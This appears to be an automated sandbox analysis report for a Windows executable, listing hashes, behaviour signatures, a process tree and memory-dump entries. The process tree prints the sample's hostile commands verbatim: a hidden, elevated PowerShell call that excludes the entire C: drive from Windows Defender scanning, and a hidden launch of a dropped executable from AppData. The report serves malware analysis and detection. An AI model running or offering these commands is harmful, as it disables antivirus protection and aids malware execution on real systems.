e6dcf394196b6a305e85eae91e900f9c5d639a51fa11def8503750a3e4d8daa4

Resubmissions

09-11-2022 04:21

221109-eyxgyafdcn 1

09-11-2022 04:08

221109-ep773sfcem 1

09-11-2022 03:58

221109-ejt39sdeg9 10

Analysis

max time kernel
32s
max time network
48s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
09-11-2022 04:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

e6dcf394196b6a305e85eae91e900f9c5d639a51fa11def8503750a3e4d8daa4.exe
Size

1.8MB
MD5

c233f8e5f9b0441782280bb49b98f415
SHA1

ddd3476e9d61fc2d707354da50b490dea8f37721
SHA256

e6dcf394196b6a305e85eae91e900f9c5d639a51fa11def8503750a3e4d8daa4
SHA512

f5404661a5349fb33e18eb632b12a6df3b7e735346bec08ee6a848375c9d6d71bd846c472bf19eccb34aa407bf16a0e214ca4ebe58f1460d4b10cf4c6fdc153c
SSDEEP

49152:j0OB/3taBrb/TMvO90d7HjmAFd4A64nsfJ4ongXG/jpC3Ohz1:/349m

Score

1^/10

Malware Config

Signatures

Suspicious behavior: EnumeratesProcesses 7 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid process

952 powershell.exe
952 powershell.exe
952 powershell.exe
1940 powershell.exe
624 powershell.exe
624 powershell.exe
624 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 952 powershell.exe
Token: SeDebugPrivilege 1940 powershell.exe
Token: SeDebugPrivilege 624 powershell.exe

pid	process
952	powershell.exe
952	powershell.exe
952	powershell.exe
1940	powershell.exe
624	powershell.exe
624	powershell.exe
624	powershell.exe

description	pid	process
Token: SeDebugPrivilege	952	powershell.exe
Token: SeDebugPrivilege	1940	powershell.exe
Token: SeDebugPrivilege	624	powershell.exe

Suspicious use of WriteProcessMemory 18 IoCs

Processes:

e6dcf394196b6a305e85eae91e900f9c5d639a51fa11def8503750a3e4d8daa4.exepowershell.execmd.exepowershell.exe

description	pid	process	target process
PID 548 wrote to memory of 952	548	e6dcf394196b6a305e85eae91e900f9c5d639a51fa11def8503750a3e4d8daa4.exe	powershell.exe
PID 548 wrote to memory of 952	548	e6dcf394196b6a305e85eae91e900f9c5d639a51fa11def8503750a3e4d8daa4.exe	powershell.exe
PID 548 wrote to memory of 952	548	e6dcf394196b6a305e85eae91e900f9c5d639a51fa11def8503750a3e4d8daa4.exe	powershell.exe
PID 952 wrote to memory of 1344	952	powershell.exe	cmd.exe
PID 952 wrote to memory of 1344	952	powershell.exe	cmd.exe
PID 952 wrote to memory of 1344	952	powershell.exe	cmd.exe
PID 1344 wrote to memory of 1940	1344	cmd.exe	powershell.exe
PID 1344 wrote to memory of 1940	1344	cmd.exe	powershell.exe
PID 1344 wrote to memory of 1940	1344	cmd.exe	powershell.exe
PID 1344 wrote to memory of 600	1344	cmd.exe	fsutil.exe
PID 1344 wrote to memory of 600	1344	cmd.exe	fsutil.exe
PID 1344 wrote to memory of 600	1344	cmd.exe	fsutil.exe
PID 548 wrote to memory of 624	548	e6dcf394196b6a305e85eae91e900f9c5d639a51fa11def8503750a3e4d8daa4.exe	powershell.exe
PID 548 wrote to memory of 624	548	e6dcf394196b6a305e85eae91e900f9c5d639a51fa11def8503750a3e4d8daa4.exe	powershell.exe
PID 548 wrote to memory of 624	548	e6dcf394196b6a305e85eae91e900f9c5d639a51fa11def8503750a3e4d8daa4.exe	powershell.exe
PID 624 wrote to memory of 1544	624	powershell.exe	cmd.exe
PID 624 wrote to memory of 1544	624	powershell.exe	cmd.exe
PID 624 wrote to memory of 1544	624	powershell.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\e6dcf394196b6a305e85eae91e900f9c5d639a51fa11def8503750a3e4d8daa4.exe
"C:\Users\Admin\AppData\Local\Temp\e6dcf394196b6a305e85eae91e900f9c5d639a51fa11def8503750a3e4d8daa4.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:548
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe "Start-Process cmd \"/k powershell Add-MpPreference -ExclusionPath 'C:\' & fsutil file createnew %AppData%\excluded.txt 1\" -Verb RunAs -WindowStyle hidden -ErrorAction SilentlyContinue"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:952
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /k powershell Add-MpPreference -ExclusionPath 'C:\' & fsutil file createnew %AppData%\excluded.txt 1
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1344
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Add-MpPreference -ExclusionPath 'C:\'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1940
  - - C:\Windows\system32\fsutil.exe
      fsutil file createnew C:\Users\Admin\AppData\Roaming\excluded.txt 1
      4⤵
      PID:600
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe "Start-Process cmd \"/k start %AppData%\ihwvffsmicqynaxuenpaisstlohgxade.exe\" -WindowStyle hidden"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:624
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /k start %AppData%\ihwvffsmicqynaxuenpaisstlohgxade.exe
    3⤵
    PID:1544

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
95b69c1ee2e7547556a2aa105bb33c31

SHA1
9a93f33ad95be7bc4cbe13c54201d67ef6c551b5

SHA256
907c2d9e87d0a742f5d544477f4471f3904dbe64233ef697807a92a95a9f3072

SHA512
5d39bd6a4ef11c4875f95514450d3dbaad5db2c8e3f235fc67195ebf2590c900e2c697b3259a8d1bbf014962837f80304bf55bccd2fda4b14cf85c28fe847f4f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
95b69c1ee2e7547556a2aa105bb33c31

SHA1
9a93f33ad95be7bc4cbe13c54201d67ef6c551b5

SHA256
907c2d9e87d0a742f5d544477f4471f3904dbe64233ef697807a92a95a9f3072

SHA512
5d39bd6a4ef11c4875f95514450d3dbaad5db2c8e3f235fc67195ebf2590c900e2c697b3259a8d1bbf014962837f80304bf55bccd2fda4b14cf85c28fe847f4f

Download Submit
memory/600-71-0x0000000000000000-mapping.dmp

Download
memory/624-79-0x000000000250B000-0x000000000252A000-memory.dmp

Filesize
124KB

Download
memory/624-78-0x0000000002504000-0x0000000002507000-memory.dmp

Filesize
12KB

Download
memory/624-76-0x000007FEF3CD0000-0x000007FEF482D000-memory.dmp

Filesize
11.4MB

Download
memory/624-75-0x000007FEF4830000-0x000007FEF5253000-memory.dmp

Filesize
10.1MB

Download
memory/624-72-0x0000000000000000-mapping.dmp

Download
memory/952-60-0x00000000028F4000-0x00000000028F7000-memory.dmp

Filesize
12KB

Download
memory/952-54-0x0000000000000000-mapping.dmp

Download
memory/952-55-0x000007FEFC281000-0x000007FEFC283000-memory.dmp

Filesize
8KB

Download
memory/952-56-0x000007FEF4830000-0x000007FEF5253000-memory.dmp

Filesize
10.1MB

Download
memory/952-57-0x000007FEF3CD0000-0x000007FEF482D000-memory.dmp

Filesize
11.4MB

Download
memory/952-58-0x00000000028F4000-0x00000000028F7000-memory.dmp

Filesize
12KB

Download
memory/952-61-0x00000000028FB000-0x000000000291A000-memory.dmp

Filesize
124KB

Download
memory/1344-59-0x0000000000000000-mapping.dmp

Download
memory/1544-77-0x0000000000000000-mapping.dmp

Download
memory/1940-67-0x000000001B740000-0x000000001BA3F000-memory.dmp

Filesize
3.0MB

Download
memory/1940-70-0x000000000274B000-0x000000000276A000-memory.dmp

Filesize
124KB

Download
memory/1940-68-0x0000000002744000-0x0000000002747000-memory.dmp

Filesize
12KB

Download
memory/1940-69-0x000000000274B000-0x000000000276A000-memory.dmp

Filesize
124KB

Download
memory/1940-62-0x0000000000000000-mapping.dmp

Download
memory/1940-66-0x000007FEF3330000-0x000007FEF3E8D000-memory.dmp

Filesize
11.4MB

Download
memory/1940-65-0x000007FEF3E90000-0x000007FEF48B3000-memory.dmp

Filesize
10.1MB

Download